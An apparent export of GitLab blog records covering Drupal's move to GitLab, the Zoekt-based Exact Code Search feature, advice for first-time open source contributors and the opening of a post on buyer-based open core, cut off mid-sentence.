opportunity to help the helpers ... so come on, let's make it happen! We can do this 😃\n\nCover image by [Steve Johnson](https://unsplash.com/photos/0sPFjdcRhko?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/search/photos/coins?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[9,267,910],{"slug":1845,"featured":6,"template":689},"donatinator-open-source-donation-platform","content:en-us:blog:donatinator-open-source-donation-platform.yml","Donatinator Open Source Donation Platform","en-us/blog/donatinator-open-source-donation-platform.yml","en-us/blog/donatinator-open-source-donation-platform",{"_path":1851,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1852,"content":1857,"config":1863,"_id":1865,"_type":14,"title":1866,"_source":16,"_file":1867,"_stem":1868,"_extension":19},"/en-us/blog/drupal-moves-to-gitlab",{"title":1853,"description":1854,"ogTitle":1853,"ogDescription":1854,"noIndex":6,"ogImage":815,"ogUrl":1855,"ogSiteName":673,"ogType":674,"canonicalUrls":1855,"schema":1856},"Come on in! Drupal is moving to GitLab","Free and open source platform Drupal is moving to GitLab to accelerate developer velocity and attract new talent and contributors to the project.","https://about.gitlab.com/blog/drupal-moves-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Come on in! Drupal is moving to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2018-08-16\",\n      }",{"title":1853,"description":1854,"authors":1858,"heroImage":815,"date":1860,"body":1861,"category":10,"tags":1862},[1859],"Rebecca Dodd","2018-08-16","\nWe never get tired of hearing about [open source projects joining the GitLab fold](/blog/welcome-gnome-to-gitlab/). So, welcome to GitLab, [Drupal](https://www.drupal.org/)! In light of this news, we chatted to Director of Engineering for the Drupal Association, [Timothy Lehnen](https://drupal.org/u/hestenet), about the project and why they're moving to GitLab.\n\n## Q&A\n\n- [What is Drupal?](#what-is-drupal)\n- [How is Drupal used?](#how-is-drupal-used-how-does-it-help-people)\n- [How many contributors work on the project?](#how-many-contributors-work-on-the-project)\n- [Why might someone use Drupal over other content management tools?](#why-might-someone-use-drupal-over-other-content-management-tools)\n- [Why are you migrating to GitLab?](#why-are-you-migrating-to-gitlab)\n- [How do you expect this move to beneficial to Drupal?](#how-do-you-expect-this-move-to-beneficial-to-drupal)\n- [How can people get involved in the project?](#how-can-people-get-involved-in-the-project)\n\n### What is Drupal?\n\nDrupal is a platform for building ambitious digital experiences. It was one of the first open source content management systems released more than 17 years ago, and is now used to power content-driven experiences including: the web, mobile, augmented reality, in-flight entertainment, medical devices, and more. Drupal is also the leading platform for building the open web. In a time when the dangers of walled-garden content publishers are becoming more and more clear, Drupal is a powerful tool to keep control in the hands of creators.\n\n### How is Drupal used? How does it help people?\n\nDrupal powers important platforms for engagement all over the world. In the governmental space you can find Drupal powering systems like [NASA.gov](https://www.nasa.gov/), the Australian [GovCMS](https://www.govcms.gov.au/), and the European Union. In the commerce space, Drupal is used to power traditional ecommerce websites, but also the holistic point-of-sale and accounting systems of the billion dollar businesses like ZKungFu, the largest directly operated food chain in China. Drupal is also the backbone of healthcare and higher education systems across the globe. Drupal can even be found behind the scenes running internal systems for the world's largest technology companies.\n\nFinally, Drupal empowers individuals and small teams to rapidly respond to current events, pitching in to give back to their communities. For example, UC Davis just launched their [Article 26 Backpack](https://www.drupal.org/blog/building-digital-backpacks-for-syrian-refugees) program for Syrian refugees, powered by Drupal.\n\n### How many contributors work on the project?\n\nIn the past year 111,783 people have contributed to Drupal in some form on Drupal.org. Over the course of the last 17 years, many hundreds of thousands of people have contributed in some way to the Drupal project.\n\n### Why might someone use Drupal over other content management tools?\n\nDrupal is a tool for building many kinds of internet-connected applications (not just websites), and is a powerful tool whenever you want to deliver rich, meaningful experiences. Drupal's not the best choice for brochure-ware sites, but that doesn't mean it's only limited to the enterprise. In any situation where you are managing large volumes of data, personalizing content for your end-users, or need a content hub to be consumed by a variety of interfaces and end-points, Drupal is an excellent choice.\n\n>In any situation where you are managing large volumes of data, personalizing content for your end-users, or need a content hub to be consumed by a variety of interfaces and end-points, Drupal is an excellent choice\n\nEven when your needs are less ambitious, Drupal has a rich library of modules and third-party integrations that provide the building blocks for powerful platforms.\n\n### Why are you migrating to GitLab?\n\nThe Drupal project began before Git was invented. The first version [control system](/topics/version-control/what-is-centralized-version-control-system/) that the project used was CVS, before the project migrated to Git in 2012. Over the course of almost two decades the Drupal project has developed our own contribution practices and developer tools, and while many of those tools and practices are leading examples in the open source world, others have fallen behind. For example, the Drupal project still handles code contributions through a patch workflow rather than through a pull/merge request workflow that has become the standard for collaborative development.\n\nWhen we began the search for a new partner to help us modernize our developer tooling, we set the following goals:\n\n- Adopt a developer workflow that will be familiar to the millions of developers outside our community\n- Preserve those unique elements of how we collaborate that have made the Drupal project so successful:\n    - Many-to-one collaboration: that is to say, many developers collaborating on a single solution to a problem\n    - Maintainer approval workflow\n    - Picking up on longstanding issues where other collaborators left off\n    - Contribution credit\n- If possible, leverage an expert partner who will help keeping our tooling up to date as open source collaboration tools continue to evolve\n\nDuring our search, GitLab was emerging as a powerful new player in the code collaboration market, and of all the teams we spoke to, GitLab's leadership demonstrated the greatest commitment to working with us to find a solution that would work for the Drupal project. The combination of that commitment to collaboration and the powerful featureset that GitLab continues to improve at a rapid pace is what helped us make our ultimate decision.\n\n### How do you expect this move to beneficial to Drupal?\n\nMoving our code collaboration tools to GitLab will help Drupal to accelerate developer velocity, and attract new talent and contributors to the project.\n\nBy giving Drupal contributors access to a merge request workflow, inline editing tools, code review, and other features of the GitLab platform they can spend less time on the administrivia and more time building Drupal.\n\n>By giving Drupal contributors access to a merge request workflow, inline editing tools, code review, and other features of the GitLab platform they can spend less time on the administrivia and more time building Drupal\n\nSimilarly, by adopting a toolchain that is much more familiar to the up-and-coming generation of developers, we can lower the barriers to entry for new contributors to join our community. For more information about the Drupal project's journey towards selecting GitLab, check out our [blog series on Drupal.org](https://www.drupal.org/drupalorg/blog/developer-tools-initiative-part-5-gitlab-partnership).\n\n### How can people get involved in the project?\n\nThe Drupal community has a comprehensive [Getting Involved Guide](https://www.drupal.org/getting-involved-guide) that can help individuals find their place in the Drupal community. There are also meet ups and conferences around the world that are a great way to start your Drupal journey. In particular, DrupalCon will be coming to [Seattle from April 8-12 2019](https://events.drupal.org/seattle2019).\n\nThe Drupal project's motto has always been \"Come for the code, stay for the community\" and seventeen years later, that's a sentiment we still believe in.\n",[9,267],{"slug":1864,"featured":6,"template":689},"drupal-moves-to-gitlab","content:en-us:blog:drupal-moves-to-gitlab.yml","Drupal Moves To Gitlab","en-us/blog/drupal-moves-to-gitlab.yml","en-us/blog/drupal-moves-to-gitlab",{"_path":1870,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1871,"content":1874,"config":1881,"_id":1883,"_type":14,"title":1884,"_source":16,"_file":1885,"_stem":1886,"_extension":19},"/en-us/blog/exact-code-search-find-code-faster-across-repositories",{"noIndex":6,"title":1872,"description":1873},"Exact Code Search: Find code faster across repositories","Discover how this new GitLab feature can find exact matches, use regex patterns, and see contextual results across terabytes of codebases.",{"title":1872,"description":1873,"authors":1875,"heroImage":1877,"date":1878,"body":1879,"category":1495,"tags":1880},[1876],"Dmitry Gruzd","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675154/Blog/Hero%20Images/blog-image-template-1800x945__8_.png","2025-06-25","**TL;DR:** What if you could find any line of code across 48 TB of repositories in milliseconds? GitLab's new [Exact Code Search](https://docs.gitlab.com/ee/user/search/exact_code_search.html) makes this possible, delivering pinpoint precision, powerful regex support, and contextual multi-line results that transform how teams work with large codebases.\n## Why traditional code search is challenging\n\nAnyone who works with code knows the frustration of searching across repositories. Whether you're a developer debugging an issue, a DevOps engineer examining configurations, a security analyst searching for vulnerabilities, a technical writer updating documentation, or a manager reviewing implementation, you know exactly what you need, but traditional search tools often fail you.\n\nThese conventional tools return dozens of false positives, lack the context needed to understand results, and slow to a crawl as codebases grow. The result? Valuable time spent hunting for needles in haystacks instead of building, securing, or improving your software.\n\nGitLab's code search functionality has historically been backed by Elasticsearch or OpenSearch. While these are excellent for searching issues, merge requests, comments, and other data containing natural language, they weren't specifically designed for code. After [evaluating numerous options](https://gitlab.com/groups/gitlab-org/-/epics/7404), we developed a better solution.\n\n## Introducing Exact Code Search: Three game-changing capabilities\n\nEnter GitLab's **[Exact Code Search](https://docs.gitlab.com/ee/user/search/exact_code_search.html)**, currently in beta testing and powered by [Zoekt](https://github.com/sourcegraph/zoekt) (pronounced \"zookt\", Dutch for \"search\"). Zoekt is an open-source code search engine originally created by Google and now maintained by Sourcegraph, specifically designed for fast, accurate code search at scale. We've enhanced it with GitLab-specific integrations, enterprise-scale improvements, and seamless permission system integration.\n\nThis feature revolutionizes how you find and understand code with three key capabilities:\n\n**1. Exact Match mode: Zero false positives**\n\nWhen toggled to **Exact Match mode**, the search engine returns only results that match your query exactly as entered, eliminating false positives. This precision is invaluable when:\n\n* Searching for specific error messages\n* Looking for particular function signatures\n* Finding instances of specific variable names\n\n**2. Regular Expression mode: Powerful pattern matching**\n\nFor complex search needs, Regular Expression mode allows you to craft sophisticated search patterns:\n\n* Find functions following specific naming patterns\n* Locate variables matching certain constraints\n* Identify potential security vulnerabilities using pattern matching\n\n**3. Multiple-line matches: See code in context**\n\n![Exact Code Search](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750704179/ttjuilkt3v7gtyywnchx.png)\n\nInstead of seeing just a single line with your matching term, you get the surrounding context that's crucial for understanding the code. This eliminates the need to click through to files for basic comprehension, significantly accelerating your workflow.\n\n## From features to workflows: Real-world use cases and impact\n\nLet's see how these capabilities translate to real productivity gains in everyday development scenarios:\n\n### Debugging: From error message to root cause in seconds\n\nBefore Exact Code Search:\nCopy an error message, search, wade through dozens of partial matches in comments and documentation, click through multiple files, and eventually find the actual code.\n\nWith Exact Code Search:\n\n1. Copy the exact error message\n2. Paste it into Exact Code Search with Exact Match mode\n3. Instantly find the precise location where the error is thrown, with surrounding context\n\n**Impact:** Reduce debugging time from minutes to seconds, eliminating the frustration of false positives.\n\n### Code exploration: Master unfamiliar codebases quickly\n\nBefore Exact Code Search:\nBrowse through directories, make educated guesses about file locations, open dozens of files, and slowly build a mental map of the codebase.\n\nWith Exact Code Search:\n\n* Search for key methods or classes with Exact Match mode\n* Review multiple line matches to understand implementation details\n* Use Regular Expression mode to find similar patterns across the codebase\n\n**Impact:** Build a mental map of code structure in minutes rather than hours, dramatically accelerating onboarding and cross-team collaboration.\n\n### Refactoring with confidence\n\nBefore Exact Code Search:\nAttempt to find all instances of a method, miss some occurrences, and introduce bugs through incomplete refactoring.\n\nWith Exact Code Search:\n\n* Use Exact Match mode to find all occurrences of methods or variables\n* Review context to understand usage patterns\n* Plan your refactoring with complete information about impact\n\n**Impact:** Eliminate the \"missed instance\" bugs that often plague refactoring efforts, improving code quality and reducing rework.\n\n### Security auditing: Finding vulnerable patterns\n\nSecurity teams can:\n\n* Create regex patterns matching known vulnerable code\n* Search across all repositories in a namespace\n* Quickly identify potential security issues with context that helps assess risk\n\n**Impact:** Transform security audits from manual, error-prone processes to systematic, comprehensive reviews.\n\n### Cross-repository insights\n\nSearch across your entire namespace or instance to:\n\n* Identify similar implementations across different projects\n* Discover opportunities for shared libraries or standardization\n\n**Impact:** Break down silos between projects and identify opportunities for code reuse and standardization.\n\n## The technical foundation: How Zoekt delivers speed and precision\n\nBefore diving into our scale achievements, let's explore what makes Zoekt fundamentally different from traditional search engines — and why it can find exact matches so incredibly fast.\n\n### Positional trigrams: The secret to lightning-fast exact matches\n\nZoekt's speed comes from its use of **positional trigrams** — a technique that indexes every sequence of three characters along with their exact positions in files. This approach solves one of the biggest pain points developers have had with Elasticsearch-based code search: false positives.\n\nHere's how it works:\n\n**Traditional full-text search engines** like Elasticsearch tokenize code into words and lose positional information. When you search for `getUserId()`, they might return results containing **user**, **get**, and **Id** scattered throughout a file — leading to those frustrating false positives for GitLab users.\n\n**Zoekt's positional trigrams** maintain exact character sequences and their positions. When you search for `getUserId()`, Zoekt looks for the exact trigrams like **get**, **etU**, **tUs**, **Use**, **ser**, **erI**, **rId**, **Id(\", \"d()**, all in the correct sequence and position. This ensures that only exact matches are returned.\n\nThe result? Search queries that previously returned hundreds of irrelevant results now return only the precise matches you're looking for. This was [one of our most requested features](https://gitlab.com/gitlab-org/gitlab/-/issues/325234) for good reason - developers were losing significant time sifting through false positives.\n\n### Regular expression performance at scale\n\nZoekt excels at exact matches and is optimized for regular expression searches. The engine uses sophisticated algorithms to convert regex patterns into efficient trigram queries when possible, maintaining speed even for complex patterns across terabytes of code.\n\n## Built for enterprise scale\n\nExact Code Search is powerful and built to handle massive scale with impressive performance. This is not just a new UI feature — it's powered by a completely reimagined backend architecture.\n\n### Handling terabytes of code with ease\n\nOn GitLab.com alone, our Exact Code Search infrastructure indexes and searches over **48 TB** of code data while maintaining lightning-fast response times. This scale represents millions of repositories across thousands of namespaces, all searchable within milliseconds. To put this in perspective: This scale represents more code than the entire Linux kernel, Android, and Chromium projects combined. Yet Exact Code Search can find a specific line across this massive codebase in milliseconds.\n\n### Self-registering node architecture\n\nOur innovative implementation features:\n\n* **Automatic node registration:** Zoekt nodes register themselves with GitLab\n* **Dynamic shard assignment:** The system automatically assigns namespaces to nodes\n* **Health monitoring:** Nodes that don't check in are automatically marked offline\n\nThis self-configuring architecture dramatically simplifies scaling. When more capacity is needed, administrators can simply add more nodes without complex reconfiguration.\n\n### Distributed system with intelligent load balancing\n\nBehind the scenes, Exact Code Search operates as a distributed system with these key components:\n\n* **Specialized search nodes:** Purpose-built servers that handle indexing and searching\n* **Smart sharding:** Code is distributed across nodes based on namespaces\n* **Automatic load balancing:** The system intelligently distributes work based on capacity\n* **High availability:** Multiple replicas ensure continuous operation even if nodes fail\n\n*Note: High availability is built into the architecture but not yet fully enabled. See [Issue 514736](https://gitlab.com/gitlab-org/gitlab/-/issues/514736) for updates.*\n\n### Seamless security integration\n\nExact Code Search automatically integrates with GitLab's permission system:\n\n* Search results are filtered based on the user's access rights\n* Only code from projects the user has access to is displayed\n* Security is built into the core architecture, not added as an afterthought\n\n### Optimized performance\n\n* **Efficient indexing:** Large repositories are indexed in tens of seconds\n* **Fast query execution:** Most searches return results with sub-second response times\n* **Streaming results:** The new gRPC-based federated search streams results as they're found\n* **Early termination:** Once enough results are collected, the system pauses searching\n\n## From library to distributed system: Engineering challenges we solved\n\nWhile Zoekt provided the core search technology, it was originally designed as a minimal library for managing `.zoekt` index files - not a distributed database or enterprise-scale service. Here are the key engineering challenges we overcame to make it work at GitLab's scale\"\n\n### Challenge 1: Building an orchestration layer\n\n**The problem:** Zoekt was designed to work with local index files, not distributed across multiple nodes serving many concurrent users.\n\n**Our solution:** We built a comprehensive orchestration layer that:\n\n* Creates and manages database models to track nodes, indices, repositories, and tasks\n* Implements a self-registering node architecture (inspired by GitLab Runner)\n* Handles automatic shard assignment and load balancing across nodes\n* Provides bidirectional API communication between GitLab Rails and Zoekt nodes\n\n### Challenge 2: Scaling storage and indexing\n\n**The problem:** How do you efficiently manage terabytes of index data across multiple nodes while ensuring fast updates?\n\n**Our solution:** We implemented:\n\n* Intelligent sharding: Namespaces are distributed across nodes based on capacity and load\n* Independent replication: Each node independently indexes from [Gitaly](https://gitlab.com/gitlab-org/gitaly) (our Git storage service), eliminating complex synchronization\n* Watermark management: Sophisticated storage allocation that prevents nodes from running out of space\n* Unified binary architecture: A single `gitlab-zoekt` binary that can operate in both indexer and webserver modes\n\n### Challenge 3: Permission Integration\n\n**The problem:** Zoekt had no concept of GitLab's complex permission system - users should only see results from projects they can access.\n\n**Our solution:** We built native permission filtering directly into the search flow:\n\n* Search requests include user permission context\n* Results are filtered to include only those the user can access in case permissions change before indexing completes\n\n### Challenge 4: Operational simplicity\n\n**The problem:** Managing a distributed search system shouldn't require a dedicated team.\n\n**Our solution:**\n\n* Auto-scaling: Adding capacity is as simple as deploying more nodes - they automatically register and start handling work\n* Self-healing: Nodes that don't check in are automatically marked offline and their work redistributed\n* Zero-configuration sharding: The system automatically determines optimal shard assignments\n\n## Gradual rollout: Minimizing risk at scale\n\nRolling out a completely new search backend to millions of users required careful planning. Here's how we minimized customer impact while ensuring reliability:\n\n### Phase 1: Controlled testing (gitlab-org group)\n\nWe started by enabling Exact Code Search only for the `gitlab-org` group - our own internal repositories. This allowed us to:\n\n* Test the system with real production workloads\n* Identify and fix performance bottlenecks\n* Streamline the deployment process\n* Learn from real users' workflows and feedback\n\n### Phase 2: Performance validation and optimization\n\nBefore expanding, we focused on ensuring the system could handle GitLab.com's scale:\n\n* Implemented comprehensive monitoring and alerting\n* Validated storage management with real production data growth\n\n### Phase 3: Incremental customer expansion\n\nWe gradually expanded to customers interested in testing Exact Code Search:\n\n* Gathered feedback on performance and user experience\n* Refined the search UI based on real user workflows\n* Optimized indexing performance (large repositories like `gitlab-org/gitlab` now index in ~10 seconds)\n* Refined the architecture based on operational learnings\n* Massively increased indexing throughput and improved state transition livecycle\n\n### Phase 4: Broad rollout\n\nToday, over 99% of Premium and Ultimate licensed groups on GitLab.com have access to Exact Code Search. Users can:\n\n* Toggle between regex and exact search modes\n* Experience the benefits without any configuration changes\n* Fall back to the previous search if needed (though few choose to)\n\nRolling this out gradually meant users didn't experience service disruptions, performance degradation, or feature gaps during the transition. We've already received positive feedback from users as they notice their results becoming more relevant and faster.\n\n> **For technical deep dive:** Interested in the detailed architecture and implementation? Check out our comprehensive [design document](https://handbook.gitlab.com/handbook/engineering/architecture/design-documents/code_search_with_zoekt/) for in-depth technical details about how we built this distributed search system.\n\n## Getting started with Exact Code Search\n\nGetting started with Exact Code Search is simple because it's already enabled by default for Premium and Ultimate groups on GitLab.com (over 99% of eligible groups currently have access).\n\n### Quickstart guide\n\n1. Navigate to the Advanced Search in your GitLab project or group\n2. Enter your search term in the code tab\n3. Toggle between Exact Match and Regular Expression modes\n4. Use filters to refine your search\n\n### Basic search syntax\n\nWhether using Exact Match or Regular Expression mode, you can refine your search with modifiers:\n\n| Query Example | What It Does                                             |\n| ------------- | -------------------------------------------------------- |\n| `file:js`     | Searches only in files containing \"js\" in their name     |\n| `foo -bar`    | Finds \"foo\" but excludes results with \"bar\"              |\n| `lang:ruby`   | Searches only in Ruby files                              |\n| `sym:process` | Finds \"process\" in symbols (methods, classes, variables) |\n\n> **Pro Tip:** For the most efficient searches, start specific and then broaden if needed. Using `file:` and `lang:` filters dramatically increases relevance.\n\n### Advanced search techniques\n\nStack multiple filters for precision:\n\n```\nis_expected file:rb -file:spec\n```\n\nThis finds \"is_expected\" in Ruby files that don't have \"spec\" in their name.\n\nUse regular expressions for powerful patterns:\n\n```\ntoken.*=.*[\\\"']\n```\n\n[Watch this search performed against the GitLab Zoekt repository.](https://gitlab.com/search?search=token.*%3D.*%5B%5C%22'%5D&nav_source=navbar&project_id=46649240&group_id=9970&search_code=true&repository_ref=main&regex=true)\n\nThe search helps find hardcoded passwords, which, if not found, can be a security issue.\n\nFor more detailed syntax information, check the [Exact Code Search documentation](https://docs.gitlab.com/user/search/exact_code_search/#syntax).\n\n## Availability and deployment\n\n### Current availability\n\nExact Code Search is currently in Beta for GitLab.com users with Premium and Ultimate licenses:\n\n* Available for over 99% of licensed groups\n* Search in the UI automatically uses Zoekt when available, Exact Code Search in Search API is behind a feature flag\n\n### Self-managed deployment options\n\nFor self-managed instances, we offer several deployment methods:\n\n* Kubernetes/Helm: Our most well-supported method, using our [`gitlab-zoekt` Helm chart](https://gitlab.com/gitlab-org/cloud-native/charts/gitlab-zoekt)\n* Other deployment options: We're working on streamlining deployment for Omnibus and other installation methods\n\nSystem requirements depend on your codebase size, but the architecture is designed to scale horizontally and/or vertically as your needs grow.\n\n## What's coming next\n\nWhile Exact Code Search is already powerful, we're continuously improving it:\n\n* **Scale optimizations** to support instances with hundreds of thousands of repositories\n* **Improved self-managed deployment** options, including streamlined Omnibus support\n* **Full high availability support** with automatic failover and load balancing\n\nStay tuned for updates as we move from Beta to General Availability.\n\n## Transform how you work with code\n\nGitLab's Exact Code Search represents a fundamental rethinking of code discovery. By delivering exact matches, powerful regex support, and contextual results, it solves the most frustrating aspects of code search:\n\n* No more wasting time with irrelevant results\n* No more missing important matches\n* No more clicking through files just to understand basic context\n* No more performance issues as codebases grow\n\nThe impact extends beyond individual productivity:\n\n* **Teams collaborate better** with easy code referencing\n* **Knowledge sharing accelerates** when patterns are discoverable\n* **Onboarding becomes faster** with quick codebase comprehension\n* **Security improves** with effective pattern auditing\n* **Technical debt reduction** becomes more feasible\n\nExact Code Search isn't just a feature, it's a better way to understand and work with code. Stop searching and start finding.\n\n**We'd love to hear from you!** Share your experiences, questions, or feedback about Exact Code Search in our [feedback issue](https://gitlab.com/gitlab-org/gitlab/-/issues/420920). Your input helps us prioritize improvements and new features.\n\n> #### Ready to experience smarter code search? Learn more in our [documentation](https://docs.gitlab.com/ee/user/search/exact_code_search.html) or try it now by performing a search in your Premium or Ultimate licensed namespaces or projects. Not a GitLab user yet? Try [a free, 60-day trial of GitLab Ultimate with Duo](https://about.gitlab.com/free-trial/)!",[1495,752,9],{"featured":6,"template":689,"slug":1882},"exact-code-search-find-code-faster-across-repositories","content:en-us:blog:exact-code-search-find-code-faster-across-repositories.yml","Exact Code Search Find Code Faster Across Repositories","en-us/blog/exact-code-search-find-code-faster-across-repositories.yml","en-us/blog/exact-code-search-find-code-faster-across-repositories",{"_path":1888,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1889,"content":1895,"config":1900,"_id":1902,"_type":14,"title":1903,"_source":16,"_file":1904,"_stem":1905,"_extension":19},"/en-us/blog/first-time-open-source-contributor-5-things-to-get-you-started",{"title":1890,"description":1891,"ogTitle":1890,"ogDescription":1891,"noIndex":6,"ogImage":1892,"ogUrl":1893,"ogSiteName":673,"ogType":674,"canonicalUrls":1893,"schema":1894},"First time open source contributor? 5 things to get you started","Open source really is *open* but it can be difficult to know where (and how) to jump in. Here's our best advice.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671390/Blog/Hero%20Images/developers-choose-open-source.jpg","https://about.gitlab.com/blog/first-time-open-source-contributor-5-things-to-get-you-started","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"First time open source contributor? 5 things to get you started\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2022-02-07\",\n      }",{"title":1890,"description":1891,"authors":1896,"heroImage":1892,"date":1897,"body":1898,"category":682,"tags":1899},[970],"2022-02-07","If you haven’t yet contributed to an open source software project, you may be eager to get going. Contributing to open source is a [great way to learn, teach, and build your technical expertise](https://clearcode.cc/blog/why-developers-contribute-open-source-software/). And it feels good to be part of a community. Yet your first time contributing can be intimidating. Here are five things you need to know to get up and running on open source:\n\n1. Contributing isn’t just about writing code. Open source projects need help on a variety of things, starting with coding, but also things like designing navigation and menus, writing documentation, managing timelines, organizing open issues, moderating message boards and answering questions. [Other ways to get started/](https://www.hanselman.com/blog/get-involved-in-open-source-today-how-to-contribute-a-patch-to-a-github-hosted-open-source-project-like-code-52) File a bug and suggest a patch for it or suggest a feature. In short, [there are many ways to contribute](https://opensource.guide/how-to-contribute/#why-contribute-to-open-source), in line with your interests and expertise. And no matter what you give, you’ll meet people and become an appreciated member of the group – sometimes contributing on ancillary things will earn you more points than coding.  \n\n2. Confusion is ok. If you’re bewildered at first, it’s not just because you’re a newbie. Each open source project has its own culture, [including terms of art, behavior norms, accepted practices](https://opensource.guide/how-to-contribute/#orienting-yourself-to-a-new-project), etc. So, even if you work for years on one project and are completely up to speed on what life is like there, it’s more than likely your next project will be totally different. There are some things that are usually present, such as the [roles of people on the project](https://opensource.guide/leadership-and-governance/), including author, owner, maintainer, contributor and committer. But the fact is, it will take time, observation and interacting with project members to understand how things are done within a project – and whether or not you are a good fit. If the vibe is not right, go elsewhere. There are so many projects that could use your support.    \n\n3. If there is a code of conduct, you need to get familiar with it. Not all open source projects will have a [code of conduct](https://opensource.guide/code-of-conduct/). When you’re interested in a project, be sure to see if there is a code of conduct and, if so, what it says. That way, you won’t make a gaffe without realizing it (and having to hear about it from everyone else). At a high level, respect the other participants (see number 5, below). If there is no explicit code of conduct, there are [core values and norms](https://opensource.com/open-organization/21/8/leadership-cultural-social-norms) that are recognized in the open source community. Chief among these are kindness and worldwide collaboration.\n\n4. Open Source Projects often have community governance models. There are [three types of org structures](https://opensource.guide/leadership-and-governance/) generally associated with open source projects: BDFL (Benevolent Dictator for Life; [Python](/blog/beginner-guide-python-programming/)is [one example](https://artsandculture.google.com/entity/benevolent-dictator-for-life/m03m3r0l?hl=en), meritocracy (this exact term may not be used but it’s about the relative “merit” of contributions; [Apache projects](https://www.apache.org/index.html#projects-list) follow this model) or liberal contribution (under which the people who contribute the most have the most say; [Node.js](https://openjsf.org) and [Rust](/blog/rust-programming-language/)are examples). In recent years, the BDFL model has [fallen out of favor](https://readwrite.com/open-source-magento-roy-rubin-bdfl/) in some circles as it leaves the project vulnerable if a leader steps away. [As Jason Baker wrote](https://opensource.com/article/18/7/bdfl) on OpenSource.com, “How an open source project is governed can have very real consequences on the long-term sustainability of its user and developer communities alike.” Just something to keep in mind.\n\n5. When in doubt, ask away, there are no dumb questions. As with any group you might belong to, you and the other members will be happier if the tone is welcoming and kind. Essentially, you’re there to collaborate so respect is important. Open source participants tend to be diverse in every possible way, stay open and considerate. Women traditionally are underrepresented in open source, [so be encouraging](https://internethealthreport.org/2019/codes-of-conduct-in-open-source-communities/). Try not to waste people’s time and provide as much context as needed in issues and conversations. Most projects will set the expectation that participants should [respect each other and be civil](https://developer.mozilla.org/en-US/docs/MDN/Contribute/Open_source_etiquette) in their interactions. \n\nThe rules are a lot like the ones you may have learned in your childhood: Observe before you jump in, share your knowledge generously, always thank people who help you, and play well with others. Don’t be tempted to add to threads just to see your name. Try to find answers to questions within the community before you ask. Read the README file. [Read the documentation](https://gomakethings.com/open-source-etiquette/). If you do ask a question or send a pull request, be patient. Don't expect an immediate reply and don’t keep posting the same question. People have different priorities and might have been caught up with work and life. Make sure you have buy-in from project implementers before you send in actual code. This shows you want to contribute and you respect the work that has gone on before you.    \n\nReady to get started? Here are some success stories from our community to inspire you:\n* Dave Barr wrote about [“Why new software engineers should contribute to GitLab”](https://davebarr.dev/why-new-software-engineers-should-contribute-to-gitlab/)\n\n* [You’re hired! Two GitLab contributors turn their success into full-time engineering roles](/blog/you-are-hired-two-gitlab-contributors-turn-their-success-into-full-time-engineering-roles/)",[9,685,267],{"slug":1901,"featured":6,"template":689},"first-time-open-source-contributor-5-things-to-get-you-started","content:en-us:blog:first-time-open-source-contributor-5-things-to-get-you-started.yml","First Time Open Source Contributor 5 Things To Get You Started","en-us/blog/first-time-open-source-contributor-5-things-to-get-you-started.yml","en-us/blog/first-time-open-source-contributor-5-things-to-get-you-started",{"_path":1907,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1908,"content":1914,"config":1920,"_id":1922,"_type":14,"title":1923,"_source":16,"_file":1924,"_stem":1925,"_extension":19},"/en-us/blog/five-ways-resist-service-wrapping-buyer-based-open-core",{"title":1909,"description":1910,"ogTitle":1909,"ogDescription":1910,"noIndex":6,"ogImage":1911,"ogUrl":1912,"ogSiteName":673,"ogType":674,"canonicalUrls":1912,"schema":1913},"5 Ways to resist the threat of service-wrapping with buyer-based open core","Commercial open source businesses are at risk of commoditization by hypercloud providers – here are some ways to avoid the trap.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680537/Blog/Hero%20Images/osls-buyer-based-open-source.jpg","https://about.gitlab.com/blog/five-ways-resist-service-wrapping-buyer-based-open-core","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"5 Ways to resist the threat of service-wrapping with buyer-based open core\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Vanessa Wegner\"}],\n        \"datePublished\": \"2019-04-03\",\n      }",{"title":1909,"description":1910,"authors":1915,"heroImage":1911,"date":1917,"body":1918,"category":10,"tags":1919},[1916],"Vanessa Wegner","2019-04-03","\n\nGitLab makes money as a commercial open source software (COSS) business. As you\nmight imagine, open source is at risk of becoming commoditized, just by its\ninherent characteristic of being completely … open. In today’s age of hyperclouds,\nopen source businesses are under threat of [service-wrapping via cloud\nproviders like Amazon](https://aws.amazon.com/blogs/aws/new-open-distro-for-elasticsearch/), Microsoft, and Google.\n\nTo avoid commoditization, [GitLab has tried a number of business models](/blog/monetizing-and-being-open-source/), from\ndonations to consultancy to single-tenant service, but none of them worked.\nFinally, we settled on open core. At this year’s Open Source Leadership Summit,\nour CEO [Sid Sijbrandij](/company/team/#sytses) talked about where GitLab has hedged its bet to avoid becoming obsolete.\nAs Sid describes in the presentation below, there are five key methods for resisting\ncommoditization with buyer-based open core.\n\n## Watch the presentation\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/G6ZupYzr_Zg\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## Key takeaways\n\n### What is buyer-based open core?\n\nBuyer-based means that GitLab offers [four different tiers of the software](/pricing/), which offer different functionality based\non what each buyer persona needs.\n\n### How do you generate revenue with buyer-based open core?\n\nEach tier focuses on what the buyer wants – and nothing more. It is also priced\naccordingly. Those at a higher level in the organization often have more budget\nauthority – so they can spend budget on what provides value for them.\n\n### How can COSSes avoid commoditization?\n\n1. Insert proprietary functionality in a majority of your use cases.\n1. Offer many proprietary features.\n1. Offer interaction through a user interface, rather 